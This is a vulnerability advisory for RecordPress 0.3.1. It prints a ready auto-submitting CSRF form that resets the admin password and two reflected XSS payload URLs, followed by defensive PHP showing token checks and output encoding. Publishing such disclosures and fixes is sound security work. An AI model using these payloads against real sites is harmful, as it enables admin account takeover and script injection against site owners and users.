RecordPress 0.3.1 Multiple Vulnerabilities

Published: 2011-03-09 CVE: N/A OSVDB-ID: N/A
----------------------------------------------------------------
WebApplication : RecordPress 0.3.1
Type of vulnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium
----------------------------------------------------------------
Producer Website : http://www.recordpress.org/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

CSRF For Change Admin Password :

<html>
<body onLoad=javascript:document.form.submit()>
<form action="http://examplesite/admin/rp-settings-users-edit-db.php?id=1"
method="POST" name="form">
<input type="hidden" name="formusername" value="admin">
<input type="hidden" name="formname" value="admin">
<input type="hidden" name="formemail" value="[email protected]">
<input type="hidden" name="formpass" value="password">
<input type="hidden" name="formpass2" value="password">
<input type="hidden" name="formadminstatus" value="2">
<input type="hidden" name="rp-settings-users-edit-db" value="Confirm+%BB">
</form>
</body>
</html>

------------------------------------------------

Cross Site Scripting Vulnerabilities :

http://examplesite/header.php?row[titledesc]=<script>alert(123)</script>
http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=<script>alert(123)</script>

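The two findings above share a single root pattern: the user-edit handler acts on any POST that arrives with the admin's session cookie, and the page templates echo request-controlled values unencoded. The PHP below is an added example (not RecordPress code) of the fix a maintainer would apply to both: a per-session anti-CSRF token issued into the form and verified with a constant-time compare before the user record is touched, and HTML-encoding of every value written into the page. The field name csrf_token, the session key, and the sample $titledesc value are assumptions chosen for the example.

```php
<?php
// Added example, not part of the RecordPress code base. Names below
// ($_SESSION['csrf_token'], the 'csrf_token' form field, $titledesc)
// are assumptions made for illustration.
session_start();

// One unpredictable token per session. A page on another origin cannot
// read it, so a forged cross-site POST cannot supply the right value.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// hash_equals() compares in constant time, so a wrong guess does not
// leak how many leading bytes matched.
function csrf_valid(?string $submitted): bool {
    return isset($_SESSION['csrf_token'], $submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Encode for HTML text and attribute contexts. A value such as
// <script>alert(123)</script> is rendered as inert text.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid anti-CSRF token.');
    }
    // Only past this point is it safe to read formusername, formpass,
    // formadminstatus, etc. and update the user record.
    // ... update logic would go here ...
    unset($_SESSION['csrf_token']); // rotate the token after each use
}

// The title comes from the application's own configuration, never from
// $_GET. Even if attacker input reached this variable, h() encodes it.
$titledesc = 'Site title <script>alert(123)</script>'; // constructed sample
?>
<!DOCTYPE html>
<html>
<head><title><?= h($titledesc) ?></title></head>
<body>
<form action="rp-settings-users-edit-db.php?id=1" method="POST">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <input type="text" name="formusername">
  <input type="password" name="formpass">
  <input type="password" name="formpass2">
  <input type="submit" name="rp-settings-users-edit-db" value="Confirm">
</form>
</body>
</html>
```

Two design choices worth noting for anyone patching a similar application: the token is rotated after each successful POST so a leaked value has a short life, and the encoding happens at the output point rather than on input, because the correct escaping depends on the context the value lands in. Sensitive operations such as a password change are also commonly gated on re-entering the current password, which defeats a forged request even if the token is somehow obtained.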

Other References

EXPLOIT-DB Advisory : http://www.exploit-db.com/exploits/16950/